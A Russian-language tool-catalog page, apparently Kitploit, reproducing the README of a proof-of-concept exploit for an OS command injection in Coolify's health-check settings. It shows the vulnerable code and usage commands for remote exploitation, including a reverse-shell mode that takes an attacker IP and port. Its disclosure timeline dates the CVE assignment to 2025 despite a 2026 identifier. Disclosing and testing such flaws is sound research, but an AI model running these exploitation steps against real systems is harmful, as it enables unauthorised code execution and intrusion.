Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-59734-POC — Внедрение команд ОС в Health Check → Удаленное выполнение кода | Kitploit
Инструменты/GitHubGitHub/cybertechajju/cve-2026-59734-poc
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubcybertechajju/cve-2026-59734-poc

CVE-2026-59734-POC

Внедрение команд ОС в Health Check → Удаленное выполнение кода

Репозиторий
22 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Hacker Glitch

🚨 CVE-2026-59734 — Эксплойт RCE в Coolify

Внедрение команд ОС в Health Check → Удалённое выполнение кода

CVE CVSS Advisory Patched Author


Medium Writeup📖 Читать полный разбор

YouTube🎥 Смотреть видео



Эксплойт Proof-of-Concept для внедрения команд ОС в настройки health check в Coolify.
Любой аутентифицированный пользователь мог выполнять произвольные команды внутри развёрнутых контейнеров.


🎯 Об уязвимости

Coolify — популярная платформа для развёртывания с открытым исходным кодом, работающая на собственном хостинге (30K+ звёзд на GitHub). Бесплатная альтернатива Heroku, Vercel и Netlify.

Критическая уязвимость внедрения команд ОС была обнаружена в конфигурации health check в Coolify. Параметры health_check_host, health_check_method и health_check_path напрямую подставляются в shell-команды без какой-либо санации, что позволяет любому аутентифицированному пользователю выполнять произвольные команды внутри контейнеров развёртывания.

root@kitploit:~
┌──────────────────┬──────────────────────────────────────┐
│ CVE ID           │ CVE-2026-59734                       │
│ Тип              │ Внедрение команд ОС (CWE-78)         │
│ Степень опасности│ ВЫСОКИЙ — CVSS 8.8                   │
│ Вектор атаки     │ Сеть (требуется аутентификация)      │
│ Затронутые версии│ Coolify <= v4.0.0-beta.460           │
│ Исправлено в     │ Coolify >= v4.0.0-beta.469           │
│ Коммит исправления│ 23f9156c7                           │
│ Сообщивший       │ CyberTechAjju                        │
└──────────────────┴──────────────────────────────────────┘
🔥 Уязвимый код (нажмите, чтобы развернуть)
root@kitploit:~
// app/Jobs/ApplicationDeploymentJob.php — generate_healthcheck_commands()

// ⚠️ Пользовательский ввод напрямую в shell-команду — нет escapeshellarg()!
$generated_healthchecks_commands = [
    "curl -s -X {$this->application->health_check_method} -f " .
    "{$this->application->health_check_scheme}://" .
    "{$this->application->health_check_host}:" .
    "{$health_check_port}" .
    "{$this->application->health_check_path} > /dev/null || exit 1",
];

🛠️ Что делает этот инструмент

Этот PoC-скрипт проверяет и эксплуатирует CVE-2026-59734 в двух режимах:

РежимОписаниеРиск
--localИмитирует уязвимый шаблон кода в офлайн-режиме. Без сетевых запросов. Тестирует все 3 инъективных параметра и проверяет исправление.✅ Безопасно
--remoteЭксплуатирует реальный экземпляр Coolify через API. Внедряет полезную нагрузку в конфигурацию health check и запускает развёртывание.⚠️ Требуется аутентификация

Возможности

  • 🧪 4 локальных теста — проверяет внедрение через host, method, path и подтверждает, что исправление с escapeshellarg() работает
  • 🔑 Проверка аутентификации — проверяет токен API и разрешения перед попыткой эксплуатации
  • 📋 Определение версии — определяет версию Coolify и предупреждает, если уже установлено исправление
  • 🎯 Доказательные токены — использует уникальные токены для предотвращения ложных срабатываний
  • 🐚 Режим обратной оболочки — встроенная полезная нагрузка reverse shell с --lhost / --lport
  • 🧹 Режим очистки — восстанавливает исходную конфигурацию health check после эксплуатации
  • 🛡️ Проверка внедрения — подтверждает, что сервер сохранил полезную нагрузку без санации

⚡ Быстрый старт

Локальная проверка (безопасно, без сети)

root@kitploit:~
git clone https://github.com/cybertechajju/CVE-2026-59734.git
cd CVE-2026-59734
chmod +x coolify_healthcheck_rce_poc.sh

# Запустить безопасную локальную проверку
./coolify_healthcheck_rce_poc.sh --local

Ожидаемый вывод:

root@kitploit:~
═══ ПРОВЕРКА ЛОКАЛЬНОГО ШАБЛОНА УЯЗВИМОСТИ ═══

┌─ Тест 1: внедрение через health_check_host
│  ✅ УЯЗВИМО — Внедрённая команда выполнена успешно

┌─ Тест 2: внедрение через health_check_method
│  ✅ УЯЗВИМО — Параметр method также подвержен внедрению

┌─ Тест 3: внедрение через health_check_path
│  ✅ УЯЗВИМО — Параметр path также подвержен внедрению

┌─ Тест 4: Проверка, что escapeshellarg() исправляет проблему
│  ✅ БЕЗОПАСНО — Санированный ввод предотвращает внедрение

Удалённая эксплуатация (только для авторизованного тестирования)

root@kitploit:~
# Базовый PoC — записывает файл-доказательство внутри контейнера
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID

# Reverse shell
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --lhost YOUR_IP \
  --lport 4444

# С автоматической очисткой (восстанавливает исходную конфигурацию после эксплуатации)
./coolify_healthcheck_rce_poc.sh --remote \
  --url https://your-coolify-instance:3000 \
  --token YOUR_API_TOKEN \
  --uuid YOUR_APP_UUID \
  --cleanup

📋 Все опции

root@kitploit:~
Использование:

  Локальная проверка (безопасно, без сети):
    ./coolify_healthcheck_rce_poc.sh --local

  Удалённая эксплуатация (требуется аутентификация):
    ./coolify_healthcheck_rce_poc.sh --remote --url <URL> --token <ТОКЕН> --uuid <UUID> [ОПЦИИ]

Опции:
  --url       URL экземпляра Coolify (например, https://coolify.example.com)
  --token     Bearer-токен API
  --uuid      UUID целевого приложения
  --payload   Пользовательская полезная нагрузка для внедрения
  --lhost     IP атакующего для reverse shell
  --lport     Порт атакующего для reverse shell (по умолчанию: 4444)
  --cleanup   Восстановить исходную конфигурацию после эксплуатации

🔍 Как получить токен API и UUID приложения

Токен API:

  1. Войдите в панель управления Coolify
  2. Перейдите в Настройки → API Tokens
  3. Сгенерируйте новый токен

UUID приложения:

root@kitploit:~
curl -s https://YOUR-COOLIFY/api/v1/applications \
  -H "Authorization: Bearer YOUR_TOKEN" | jq '.[].uuid'

📖 Полный разбор

Я написал подробную статью в блоге, описывающую весь процесс обнаружения, эксплуатации и извлечённые уроки:

🔗 How I Found an OS Command Injection (RCE) in Coolify — Medium


🎥 Видеоразбор

Посмотрите полную демонстрацию эксплуатации на YouTube:

🔗 CVE-2026-59734 — Coolify RCE Demo — YouTube


✅ Хронология

ДатаСобытие
6 января 2025🔍 Обнаружено и сообщено через GitHub Security Advisory
16 января 2025✅ Отчёт принят мейнтейнером Coolify
24 февраля 2025🔬 Расследование подтверждено
18 марта 2025🔧 Исправление закоммичено (23f9156c7)
12 апреля 2025📦 Исправление выпущено в v4.0.0-beta.469
Июль 2025🏷️ Присвоен CVE-2026-59734 и опубликовано уведомление

⚠️ Правовое предупреждение

Этот инструмент предоставляется ТОЛЬКО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ И АВТОРИЗОВАННЫХ ЦЕЛЕЙ ТЕСТИРОВАНИЯ БЕЗОПАСНОСТИ.

Данный PoC предназначен для исследователей безопасности и охотников за багами, чтобы тестировать системы, на которые у них есть явное задокументированное разрешение. Несанкционированное использование против систем, которые вам не принадлежат, строго запрещено и может нарушать местные и федеральные законы.

Автор (CyberTechAjju) не несёт никакой ответственности за неправильное использование или ущерб, причинённый этим инструментом.


🏆 Другие CVE от CyberTechAjju

CVEЦельТипСтепень опасности
CVE-2026-45156Nextcloud user_oidcОбход подписи JWT🔴 Критическая (9.8)
CVE-2026-59734CoolifyВнедрение команд ОС🟠 Высокая (8.8)

Medium YouTube GitHub



"Они забыли обработать ввод. Я не забыл сообщить."
🇮🇳 Взломай планету. 🌎💻

Скачать инструмент